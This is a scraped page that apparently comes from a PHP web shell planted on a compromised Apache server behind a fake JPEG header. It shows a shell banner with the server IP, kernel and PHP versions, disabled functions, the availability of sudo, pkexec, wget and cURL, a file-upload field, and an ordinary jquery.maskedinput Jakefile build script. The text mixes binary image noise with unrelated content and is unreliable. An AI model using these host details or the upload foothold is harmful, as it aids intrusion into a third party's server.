����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 3.135.211.95 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/admin/assets/plugins/jquery.maskedinput/ |
Upload File : |
var Handlebars=require("handlebars"), fs = require("fs"), path = require ("path"), UglifyJS = require("uglify-js"), distPath='dist/'; Handlebars.registerHelper('include', function(context) { return fs.readFileSync(context,'utf8'); }); function keepComment(node,comment){ return comment.type === "comment2"; } task('clean',function(){ fs.rmdir(distPath) }); task('default',['clean'], function (params) { fs.mkdir(distPath,0755); var options = JSON.parse(fs.readFileSync('plugin.json','utf8')) options.Year=new Date().getFullYear() var template = Handlebars.compile(fs.readFileSync('templates/jquery.maskedinput.template','utf8')); var debugFile = path.join(distPath,'jquery.maskedinput.js'); fs.writeFileSync(debugFile,template(options)); compressed = UglifyJS.minify(debugFile,{output:{comments:keepComment}}); fs.writeFileSync(path.join(distPath,'jquery.maskedinput.min.js'), compressed.code); });